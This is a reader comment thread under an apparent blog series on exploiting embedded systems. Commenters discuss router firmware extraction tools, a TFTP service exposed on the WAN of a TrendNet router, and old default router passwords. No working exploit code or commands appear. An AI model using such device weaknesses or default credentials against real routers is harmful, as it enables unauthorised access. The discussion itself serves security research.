Well, this wasn’t a default password. The database mentioned above contains the device’s current running configuration and was pulled directly from the device.
Default passwords can be a problem though. Verizon FIOS routers now use the router’s serial number as the administrator password (it used to be password or password1), but most just have some simple default login.
Pingback: /dev/ttyS0 » Blog Archive » Exploiting Embedded Systems – Part 2
This is very interesting and thanks for sharing!
unfortunately, Linksys is not like the Trendnet.
I tried on a linksys E2000 the same techniques but they built their firmware differently.
I had the latest firmware opened with the mod kit.
It is possible to tftp onto the router but I was unable to get any files. Also there are no databases to sqlite into 🙂
Anyhow, thanks for posting this and it was fun to try!
where I download the firmware modkit?, the project has no download link ..
nice tut, thanks
Nice article.
Do you know how to extract the file system of NB WS200 firmware (http://support.intellicom.se/dynpage.cfm?FPID=90)?
@W2P:
You have to check the firmware mod kit out of the subversion repository. Follow the instructions here: http://code.google.com/p/firmware-mod-kit/source/checkout
@Replika:
I haven’t worked with that device before, but I’ll take a look at it.
@Replika:
There is a big endian JFFS2 file system starting at offset 96 in the firmware image that you linked to.
1.1.1.102 doesn’t appear to be in a traditional private address space, does that mean that the tftp daemon is able to accept external internet connections, if so that is quite frightening that they didn’t kill it after the boot process or at the very least restrict their build or configuration of tftpd to local network only as that is even more trivial then implementing the protocol itself.
@anonymous:
Yes, this series of articles assumes that we only have WAN access to the device, and yes, TFTP is enabled on the WAN by default. Unfortunately this isn’t as uncommon as you might think…
Pingback: /dev/ttyS0 » Blog Archive » Exploiting Embedded Systems – Part 4
your blog rocks !
can’t wait for the rest !
Is it possible to emulate the device? Because I can’t follow the steps when you try to stablish a remote connection through tftpd.
Thanks in advanced 🙂
Nice article!
Emulating an entire device can be pretty tricky. It’s probably easier to emulate just the tftpd service. Try something like this.
Great article, thanks!
I try first with binwalk only + dd + unsquashfs, but unsquashfs for DIR-320 NRU FW was unable to extract files.
firmware-mod-kit does all the job! great tool!!! 🙂
It seems the firmware mod kit is not available on google code. Does anyone know where can I download it from?
Many thanks
The firmware mod kit is available from the google code page linked to in this post. There is no download though, you need to check it out from the subversion repository (follow the instructions on the FMK sites’s ‘Source’ tab).
Great post. I would love to let you in on a secret for rooting a Sony DVD player in the name of research.
Please upload the Firmware, it is not possible to get it anywhere.
we need it for the practice, if we dont have it all the other tutorials are useless :\
Have you tried http://lmgtfy.com/?q=tew654tr+firmware ? 😉
Yes of course i did,
the current version on the website is :
Version: v1.10 build 23
Release Date: 10/2013
and u use here build 12.
unless im missing something…
Try the second Google result (download.trendnet.com). All the firmware releases for this device are available there.
Thanks Craig. On my journey to exhaustively read your post one by one.